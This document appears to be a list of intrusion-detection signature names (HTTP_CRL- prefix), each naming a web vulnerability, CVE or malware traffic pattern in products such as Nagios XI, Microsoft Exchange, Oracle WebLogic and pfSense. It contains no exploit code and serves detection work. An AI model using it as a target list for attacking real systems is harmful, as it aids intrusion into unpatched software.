HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Copyfile-Information-Disclosure
HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Listdirectory-Information-Disclosure
HTTP_CRL-Manageengine-Multiple-Products-File-Attachment-Directory-Traversal
HTTP_CRL-Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal
HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Arbitrary-File-Download
HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download
HTTP_CRL-Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection
HTTP_CRL-Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection
HTTP_CRL-Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078
HTTP_CRL-Manageengine-Opmanager-Hidden-Administrator-Account-Usage
HTTP_CRL-Manageengine-Opmanager-SubmitQuery-SQL-Injection
HTTP_CRL-Manageengine-Password-Manager-Pro-SQL-Injection
HTTP_CRL-Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163
HTTP_CRL-Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection
HTTP_CRL-Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal
HTTP_CRL-Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal
HTTP_CRL-Manageengine-Servicedesk-Plus-User-Privileges-Bypass
HTTP_CRL-Mango-Automation-Scada-Cross-Site-Scripting
HTTP_CRL-Mantal.A-Traffic
HTTP_CRL-Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting
HTTP_CRL-Mantis-MantisBT-Bug-Tracker_Config_Report-Move_Attachments_Page-XSS
HTTP_CRL-Marketscore.B-Traffic
HTTP_CRL-McAfee-Asset-Manager-Downloadreport-Information-Disclosure
HTTP_CRL-McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting
HTTP_CRL-McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection
HTTP_CRL-McAfee-Epolicy-Orchestrator-XML-Entity-Injection
HTTP_CRL-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
HTTP_CRL-MDaemon-HTTP-Raw-Message-Handler-Buffer-Overflow
HTTP_CRL-MediaWiki-CSS-Extension-Path-Traversal
HTTP_CRL-MediaWiki-Uselang-Php-Code-Execution
HTTP_CRL-Metabase-GeoJSON-URL-Local-File-Inclusion
HTTP_CRL-Metersphere-V1.15.4-Authenticated-SQL-Injection
HTTP_CRL-Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting
HTTP_CRL-Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow
HTTP_CRL-Micro-Focus-NetIQ-Access-Manager-Identity-Server-Ospuibasicssodownload-Directory-Traversal
HTTP_CRL-Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal
HTTP_CRL-Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE
HTTP_CRL-Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection
HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Command-Injection
HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection
HTTP_CRL-Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE
HTTP_CRL-Microjoin.gen_C-Traffic
HTTP_CRL-Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757
HTTP_CRL-Microsoft-Anti-XSS-Library-Bypass-Vulnerability
HTTP_CRL-Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege
HTTP_CRL-Microsoft-ASP.NET-ViewState-Denial-Of-Service
HTTP_CRL-Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability
HTTP_CRL-Microsoft-Edge-CVE-2016-7280
HTTP_CRL-Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution
HTTP_CRL-Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write
HTTP_CRL-Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207-2
HTTP_CRL-Microsoft-Exchange-Privilege-Escalation-Exploit
HTTP_CRL-Microsoft-Exchange-ProxyShell-RCE
HTTP_CRL-Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE
HTTP_CRL-Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting
HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473
HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473-2
HTTP_CRL-Microsoft-Exchange-Validation-Key-Remote-Code-Execution
HTTP_CRL-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
HTTP_CRL-Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
HTTP_CRL-Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability
HTTP_CRL-Microsoft-Office-SharePoint-Server-Cross-Site-Scripting
HTTP_CRL-Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting
HTTP_CRL-Microsoft-Report-Viewer-Control-Cross-Site-Scripting
HTTP_CRL-Microsoft-Sharepoint-Calendar-Cross-Site-Scripting
HTTP_CRL-Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability
HTTP_CRL-Microsoft-Sharepoint-Macro-Workflow-Insecure-Deserialization
HTTP_CRL-Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting
HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0017
HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0144
HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0145
HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2015-1640
HTTP_CRL-Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754
HTTP_CRL-Microsoft-SQL-Server-Reflected-XSS
HTTP_CRL-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
HTTP_CRL-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting
HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Vulnerability
HTTP_CRL-Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability
HTTP_CRL-Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264
HTTP_CRL-Microsoft.NET-Iriparsing-Remote-Code-Execution
HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295
HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181
HTTP_CRL-Mida-Solutions-eFramework-ajaxreq.php-Command-Injection
HTTP_CRL-MineBridge-Trojan-Infection-Traffic
HTTP_CRL-Mitel-MiCollab-SQL-Injection-CVE-2024-35286
HTTP_CRL-Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499
HTTP_CRL-Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710
HTTP_CRL-Mlflow-Experiments-Local-File-Inclusion-Vulnerabilities
HTTP_CRL-MobileIron-Remote-Code-Execution-CVE-2020-15505
HTTP_CRL-Mobilespy.a-Traffic
HTTP_CRL-MODx-Reflect-Base-File-Inclusion
HTTP_CRL-MODX-Revolution-phpthumb.php-CVE-2018-1000207
HTTP_CRL-Mongo-Express-Remote-Code-Execution-CVE-2019-10758
HTTP_CRL-MONSOON-CnC-Traffic
HTTP_CRL-Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting
HTTP_CRL-Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion
HTTP_CRL-Montala-ResourceSpace-User_Functions-SQL-Injection
HTTP_CRL-Moodle-Authenticated-Spelling-Binary-RCE
HTTP_CRL-Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133
HTTP_CRL-Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425
HTTP_CRL-Moodle-Remote-Command-Execution
HTTP_CRL-Moodle-SpellChecker-Path-Authenticated-RCE
HTTP_CRL-Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE
HTTP_CRL-MS-Forefront-UAG-ExcelTable-Reflected-XSS
HTTP_CRL-MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS
HTTP_CRL-MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010
HTTP_CRL-Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections
HTTP_CRL-Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow
HTTP_CRL-Mutiny-Subnetmask-Injection
HTTP_CRL-MyBB-Admin-Control-Panel-Code-Injection
HTTP_CRL-MyBB-Domecode-Function-Remote-Php-Code-Execution
HTTP_CRL-mySCADA-myPRO-CVE-2023-28400-Command-Injection
HTTP_CRL-mySCADA-myPRO-Datafromviewscripts-Command-Injection
HTTP_CRL-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow
HTTP_CRL-Nagios-Command-Execution
HTTP_CRL-Nagios-Core-Config-Manager-Tfpassword-SQL-Injection
HTTP_CRL-Nagios-History.cgi-Parameter-Buffer-Overflow
HTTP_CRL-Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting
HTTP_CRL-Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-Network-Analyzer-Report-Generator-Command-Injection
HTTP_CRL-Nagios-Statuswml-Cgi-Command-Injection
HTTP_CRL-Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Account-Main-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection
HTTP_CRL-Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931-CVE-2023-40933
HTTP_CRL-Nagios-XI-API-Key-Regeneration-Privilege-Escalation
HTTP_CRL-Nagios-XI-Autodiscovery-Arbitrary-Command-Execution
HTTP_CRL-Nagios-XI-Autodiscovery-Job-Command-Injection
HTTP_CRL-Nagios-XI-Autodiscovery-WebShell-Upload
HTTP_CRL-Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection
HTTP_CRL-Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection
HTTP_CRL-Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite
HTTP_CRL-Nagios-XI-Cmdsubsys-Command-Injection
HTTP_CRL-Nagios-XI-Command_test.php-Command-Injection
HTTP_CRL-Nagios-XI-Configwizards-Multiple-Command-Injections
HTTP_CRL-Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection
HTTP_CRL-Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal
HTTP_CRL-Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal
HTTP_CRL-Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Helpedit.php-SQL-Injection
HTTP_CRL-Nagios-XI-historytab_content.php-SQL-Injection
HTTP_CRL-Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection
HTTP_CRL-Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Mibs.php-Command-Injection
HTTP_CRL-Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Privilege-Escalation
HTTP_CRL-Nagios-XI-Remote-Code-Execution
HTTP_CRL-Nagios-XI-SNMP-Trap-SQL-Injection
HTTP_CRL-Nagios-XI-Two-Reflected-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection
HTTP_CRL-Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting
HTTP_CRL-Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection
HTTP_CRL-NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting
HTTP_CRL-Nas4Free-Remote-Command-Execution
HTTP_CRL-NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal
HTTP_CRL-NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection
HTTP_CRL-Nerbian-RAT-C2-Traffic
HTTP_CRL-Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution
HTTP_CRL-Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting
HTTP_CRL-Netgate-Pfsense-Command-Injection-CVE-2023-42326
HTTP_CRL-Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325
HTTP_CRL-Netgate-Pfsense-Diag_packet_capture.php-Command-Injection
HTTP_CRL-Netgate-Pfsense-Diag_Routes-Command-Injection
HTTP_CRL-Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting
HTTP_CRL-Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting
HTTP_CRL-Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting
HTTP_CRL-Netgate-Pfsense-Status-Command-Injection
HTTP_CRL-Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538
HTTP_CRL-Netgate-Pfsense-System_Advanced_misc.php-Command-Injection
HTTP_CRL-NetGear-DGN1000-Remote-Command-Execution
HTTP_CRL-NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077
HTTP_CRL-NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion
HTTP_CRL-NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion
HTTP_CRL-NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337
HTTP_CRL-NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection
HTTP_CRL-NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload
HTTP_CRL-NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection
HTTP_CRL-NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal
HTTP_CRL-NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion
HTTP_CRL-NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting
HTTP_CRL-NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection
HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal
HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
HTTP_CRL-NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919
HTTP_CRL-NetGear-RAX43-Command-Injection-CVE-2021-20167
HTTP_CRL-NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555
HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174
HTTP_CRL-Netis-Router-MW5360-Unauthenticated-RCE
HTTP_CRL-Netis-Router-Unauthenticated-Password-Change
HTTP_CRL-Netis-WF2419-Remote-Code-Execution-CVE-2019-19356
HTTP_CRL-Netlink-GPON-Router-Remote-Code-Execution
HTTP_CRL-Nexus-Repository-Manager-Java-EL-Injection
HTTP_CRL-Nginx-Location-NTFS-Extended-Attributes-Security-Bypass
HTTP_CRL-Nginx-Remote-Source-Code-Disclosure
HTTP_CRL-Nitro-Stealer-Infection-Traffic
HTTP_CRL-NodCMS-Edit_Lang_File-PHP-Code-Execution
HTTP_CRL-Novell-eDirectory-iMonitor-Cross-Site-Scripting
HTTP_CRL-Novell-File-Reporter-Arbitrary-File-Delete
HTTP_CRL-Novell-File-Reporter-FSFUI-Record-Directory-Traversal
HTTP_CRL-Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption
HTTP_CRL-Novell-iManager-Class-Name-Remote-Buffer-Overflow
HTTP_CRL-Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow
HTTP_CRL-Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow
HTTP_CRL-Novell-iManager-Tree-Name-Denial-Of-Service
HTTP_CRL-Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure
HTTP_CRL-Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure
HTTP_CRL-Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure
HTTP_CRL-Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection
HTTP_CRL-Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection
HTTP_CRL-Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure
HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal
HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-RCE
HTTP_CRL-Novell-ZENworks-Mobile-Management-Cross-Site-Scripting
HTTP_CRL-Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution
HTTP_CRL-Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution
HTTP_CRL-Nph-Maillist
HTTP_CRL-NSClient++-ExternalScripts-Authenticated-RCE
HTTP_CRL-Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution
HTTP_CRL-Nuxeo-Nuxeounknownresource-Expression-Language-Injection
HTTP_CRL-Obad-Traffic
HTTP_CRL-Obad.a-Traffic
HTTP_CRL-ocPortal-Arbitrary-File-Inclusion-Vulnerability
HTTP_CRL-OCS-Inventory-NG-Commandline.php-Command-Injection
HTTP_CRL-Oficla-Traffic
HTTP_CRL-OMI-Agent-Unauthenticated-RCE
HTTP_CRL-Online-Store-Kit-SQL-Injection
HTTP_CRL-OP5-license.php-Remote-Command-Execution
HTTP_CRL-OP5-Welcome Remote-Command-Execution
HTTP_CRL-Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection
HTTP_CRL-Open-Web-Analytics-Remote-Code-Execution
HTTP_CRL-OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting
HTTP_CRL-OpenDocMan-Cross-Site-Scripting-CVE-2015-5625
HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting
HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting-2
HTTP_CRL-Openemr-Calendar-Search-SQL-Injection
HTTP_CRL-Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting
HTTP_CRL-Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting
HTTP_CRL-Openemr-Download_template.php-Directory-Traversal
HTTP_CRL-Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting
HTTP_CRL-Openemr-Globals.php-Authentication-Bypass
HTTP_CRL-Openemr-New.php-Command-Injection
HTTP_CRL-Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting
HTTP_CRL-Openemr-Patient_Report-Stored-Cross-Site-Scripting
HTTP_CRL-Openemr-Phpgacl-Edit_group.php-SQL-Injection
HTTP_CRL-Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting
HTTP_CRL-Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting
HTTP_CRL-Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting
HTTP_CRL-OpenFire-Server-Multiple-Vulnerabilities
HTTP_CRL-OpenMediaVault-Cron-Remote-Command-Execution
HTTP_CRL-Openmetadata-Authentication-Bypass-CVE-2024-28255
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255
HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting
HTTP_CRL-OpenNetAdmin-Ping-Command-Injection
HTTP_CRL-OpenNMS-XML-External-Entity-Injection
HTTP_CRL-OpenProject-Cross-Site-Scripting-CVE-2019-17092
HTTP_CRL-OpenSIS-Modname-Code-Execution
HTTP_CRL-OpenSIS-Unauthenticated-PHP-Code-Execution
HTTP_CRL-OpenSSH-Backdoor-C2-Traffic
HTTP_CRL-OpenTSDB-2.4.0-Unauthenticated-Command-Injection
HTTP_CRL-OpenTSDB-2.4.1-Unauthenticated-Command-Injection
HTTP_CRL-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution
HTTP_CRL-OpenX-Flowplayer-Backdoor-Remote-Code-Execution
HTTP_CRL-Opmantek-Open-Audit-M_discoveries.php-Command-Injection
HTTP_CRL-Oracle-10g-Isqlplus-Service-Heap-Overflow
HTTP_CRL-Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass
HTTP_CRL-Oracle-Application-Testing-Suite-Authentication-Bypass
HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal
HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal
HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Schedulereportname-Directory-Traversal
HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal
HTTP_CRL-Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal
HTTP_CRL-Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal
HTTP_CRL-Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal
HTTP_CRL-Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal
HTTP_CRL-Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow
HTTP_CRL-Oracle-Bea-WebLogic-Server-Apache-Connector-DoS
HTTP_CRL-Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization
HTTP_CRL-Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection
HTTP_CRL-Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection
HTTP_CRL-Oracle-Client-System-Analyzer-Arbitrary-File-Upload
HTTP_CRL-Oracle-Database-Application-Express-Password-Hash-Disclosure
HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS
HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS
HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS
HTTP_CRL-Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545
HTTP_CRL-Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS
HTTP_CRL-Oracle-E-Business-Suite-Human-Resources-SQL-Injection
HTTP_CRL-Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting
HTTP_CRL-Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting
HTTP_CRL-Oracle-Fusion-Middleware-Remote-Code-Execution
HTTP_CRL-Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities
HTTP_CRL-Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636
HTTP_CRL-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting
HTTP_CRL-Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection
HTTP_CRL-Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection
HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Authentication-Bypass
HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Command-Injection
HTTP_CRL-Oracle-Secure-Backup-Authentication-Bypass
HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Execution
HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Injection
HTTP_CRL-Oracle-Secure-Backup-Remote-Cookies-Command-Injection
HTTP_CRL-Oracle-Single-Sign-On-Vulnerability
HTTP_CRL-Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization
HTTP_CRL-Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection
HTTP_CRL-Oracle-WebLogic-Server-Admin-Console-War-Deployment
HTTP_CRL-Oracle-WebLogic-Server-CVE-2020-14882
HTTP_CRL-Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection
HTTP_CRL-Oracle-WebLogic-Server-Deserialization-RCE
HTTP_CRL-OrientDB-Remote-Code-Execution
HTTP_CRL-osCommerce-Installer-Unauthenticated-Code-Execution
HTTP_CRL-OWASP-CoreRule-Request-944-Application-Attack-Java-944130
HTTP_CRL-OWASP-CoreRule-Request-944-Application-Attack-Java-944130-Potential
HTTP_CRL-PAJAX-Remote-Command-Execution
HTTP_CRL-Palo-Alto-Expedition-Command-Injection-CVE-2024-9463
HTTP_CRL-Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464
HTTP_CRL-Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107
HTTP_CRL-Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465
HTTP_CRL-Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474
HTTP_CRL-PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579
HTTP_CRL-PAN-OS-Remote-Code-Execution-CVE-2017-15944
HTTP_CRL-Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320
HTTP_CRL-Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971
HTTP_CRL-Pandora-FMS-Events-RCE
HTTP_CRL-Pandora-FMS-Ping-Authenticated-RCE
HTTP_CRL-Panews-MySQL-Prefix-SQL-Injection
HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350
HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351
HTTP_CRL-Papercut-NG-External-User-Lookup-Code-Injection
HTTP_CRL-Perl-Null-And-Pipe-In-URI-Arg
HTTP_CRL-Perl-Null-In-URI-Arg-1
HTTP_CRL-Perl-Null-In-URI-Arg-2
HTTP_CRL-Perl-Pipe-In-URI-Arg-1
HTTP_CRL-Perl-Pipe-In-URI-Arg-2
HTTP_CRL-PerlDesk-kb.cgi-View-Parameter-SQL-Injection
HTTP_CRL-Pfsense-Post-Auth-Group-Member-Command-Execution
HTTP_CRL-Pfsense-Webconfigurator-Firewall_Aliases_Edit-Input-Validation-Error
HTTP_CRL-Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting
HTTP_CRL-Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002
HTTP_CRL-Pgadmin-Binary-Path-API-RCE
HTTP_CRL-Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241
HTTP_CRL-Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945
HTTP_CRL-Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution
HTTP_CRL-Pgadmin-Validate_Binary_Path-Remote-Code-Execution
HTTP_CRL-Phamm-Helpers.php-Cross-Site-Scripting
HTTP_CRL-Phf-Cgi-Command-Execution
HTTP_CRL-Phorum-Register-Php-SQL-Injection
HTTP_CRL-Phorum-SQL-read.php3-Attack
HTTP_CRL-Php-cfgProgDir-Parameter-File-Inclusion
HTTP_CRL-Php-Core-Unserialize-Key-Name-Use-After-Free
HTTP_CRL-Php-Crlf-Header-Injection-Proxing-Attack
HTTP_CRL-Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service
HTTP_CRL-Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion
HTTP_CRL-PHP-Fusion-Downloads.php-Command-Injection
HTTP_CRL-Php-Generic-Shellcode-Encoder-Stub
HTTP_CRL-Php-Htmlspecialchars-Htmlentities-Buffer-Overflow
HTTP_CRL-PHP-IMAP-Open-RCE
HTTP_CRL-PHP-Phar-404-Page-Reflected-Cross-Site-Scripting
HTTP_CRL-Php-Quot-Print-Encode-Heap-Buffer-Overflow
HTTP_CRL-Php-Reserved-Server-Variable-In-Request
HTTP_CRL-Php-Shell-Escape-Functions-Command-Execution
HTTP_CRL-Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption
HTTP_CRL-Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption
HTTP_CRL-Phpbb-Viewtopic-Urldecode-System-Compromise
HTTP_CRL-PhpDig-Config-Php-System-Compromise
HTTP_CRL-PhpFileManager-Cmd-Parameter-Command-Execution
HTTP_CRL-phpLDAPadmin-Remote-PHP-Code-Injection
HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection
HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection-2
HTTP_CRL-PHPMailer-Mail-Sender-Command-Injection
HTTP_CRL-PHPMoAdmin-Remote-Code-Execution
HTTP_CRL-Phpmyadmin-Grab-Globals-Lib-File-Disclosure
HTTP_CRL-Phpmyadmin-Index.php-Local-File-Inclusion
HTTP_CRL-Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting
HTTP_CRL-Phpmyadmin-Preg_Replace-Function-Code-Injection
HTTP_CRL-Phpmyadmin-SQL-Goto-Remote-Code-Injection-Compromise
HTTP_CRL-PHPNews-news.php-SQL-Injection
HTTP_CRL-phpScheduleIt-PHP-Code-Injection-Vulnerability
HTTP_CRL-PHPWAY-Link-Management-Script-Main-Page-Directory-Remote-File-Inclusion
HTTP_CRL-PHPWAY-Link-Management-Script-Page-To-Include-Remote-File-Inclusion
